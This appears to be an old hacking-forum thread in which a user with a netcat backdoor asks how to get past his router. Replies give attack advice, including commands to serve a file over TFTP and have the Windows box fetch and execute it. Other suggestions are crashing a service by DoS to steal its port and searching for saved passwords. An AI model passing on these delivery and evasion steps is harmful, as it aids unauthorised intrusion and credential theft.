Install exploitable content

[CrispyJones]

Hey i was just wondering if there was anything you could do from command promp in windows that could be exploit'd,
By that i mean i'v made a netcat backdoor loaded it on my windows box right,, gotten it to reverse connect to backtrack,, and now i have root accesss,, yay,,
but you see i like the meterpreter dealio,, so i was wondering if there was anything you could upload and run or try to connect back to backtrack with something that you could exploit,, not shaw,, i was able to exploit netcat110_nt wile in my own network,, but when i try to do that from outside my network my router is blocking the port i need to exploit,, you see my problem.. any help would be greatfull,,,,

[jackabee]

So what do you want?
To get around port blocking, if your trying a reverse connection from your windows box to your bt box, then you would want to use port 80 probably as its 99.9% of the time not blocked. If your trying to forward connect to your windows box, then you would have to either hack the router, or find a web service thats running on that box (and the router forwards to it), crash it (with a DOS attack probably) and have your service steal the port it was listening on.

Hope this helps

[CrispyJones]

How do you do a dos attack,, got any good links? yeah iv try'd that port 80 thing dosnt work.. im trying to find a service that from the windows box connects to backtrack,, like tftp of telnet or any thing that connect's out of the windows box so that it pass's throught the router, and then i can exploit it,,,

[jackabee]

For a DOS attack, you would want to get the service version and OS info using a tool like nmap (e.g. nmap -sV -O <host>) then find a working exploit for that service (e.g. from milw0rm)

As an example

Code:

bt ~ # nmap -sV -O 127.0.0.1

Starting Nmap 4.50 ( http insecure org ) at 2008-06-20 16:08 GMT
Interesting ports on bt.example.net (127.0.0.1):
Not shown: 1706 closed ports
PORT     STATE SERVICE   VERSION
25/tcp   open  smtp      Sendmail 8.14.1/8.14.1
80/tcp   open  http      Apache httpd 2.2.4 ((Unix) DAV/2)
587/tcp  open  smtp      Sendmail 8.14.1/8.14.1
5800/tcp open  vnc-http?
5900/tcp open  vnc       VNC (protocol 3.3)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.17 - 2.6.21
Uptime: 0.134 days (since Fri Jun 20 12:57:01 2008)
Network Distance: 0 hops
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at http: insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.536 seconds

bt ~ # cd /pentest/exploits/milw0rm/
bt milw0rm # cat sploitlist.txt | grep -i sendmail
./platforms/linux/remote/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
./platforms/linux/local/411.c Sendmail 8.11.x Exploit (i386-Linux)
./platforms/linux/dos/2051.py Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC
./platforms/multiple/remote/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
./rport/25/24.c Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
./rport/25/4761.pl Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
bt milw0rm #

However, as you can see, there are no exploits for my version of sendmail, so this technique won't always work.

If you want to use tftp to make the windows box download something from you, you'll need to start a tftp server on your backtrack box first. So put your file in /tmp then:

Code:

atftpd --daemon --port 69 /tmp

And on your windows machine:

Code:

tftp -i <yourip> GET <filename>

Now you can simply execute the file on your windows box.

When your done, do

Code:

killall atftpd

to stop the tftp server

[CrispyJones]

cool thanks.. but what im trying to say is, when i nmap i get nothing because im trying to audit through my router,,,, and theres nothing, so i thought if i start a service from the inside then i could exploit it,, but the question is what service,,, i have command prompt so thats kinda limited,, or maby upload a service and run that ,,,,, the question is really what service can i exploit upon reverse connection..

[ShadowKill]

cool thanks.. but what im trying to say is, when i nmap i get nothing because im trying to audit through my router,,,, and theres nothing, so i thought if i start a service from the inside then i could exploit it,, but the question is what service,,, i have command prompt so thats kinda limited,, or maby upload a service and run that ,,,,, the question is really what service can i exploit upon reverse connection..

There is a VERY long list of exploitable services ranging to specific releases to entire generations of software. Google is your friend, do your homework on exploitable services first, try some things out, and then come back if you have any issues, or simply come back to say "Hey, I figured it out! This is what I did....."

[jackabee]

so you have your remote shell, and I presume that outbound port 80 is allowed? If so then it should be possible to start a atftpd server on port 80 and get the windows machine to dl from it. If port 80 UDP is filtered the you will need another method (idk to be honest, i dont use windows command prompt much. If it was a linux shell, you could start apache and wget your exploit). If your bt box is behind a router, then you will need to do some port forwarding on that.

Apart from that, the best you can probably do is explore the filesystem, find software versions, and see if you can find any exploits for them. You could also search for saved passwords (like for your routers web interface etc...). I cant remember the windows registry commands but if you google for them im sure they would be helpful.

[CrispyJones]

thanks that helps windows does have wget,, il have to give that a try

[jackabee]

You learn something every day
Should do the trick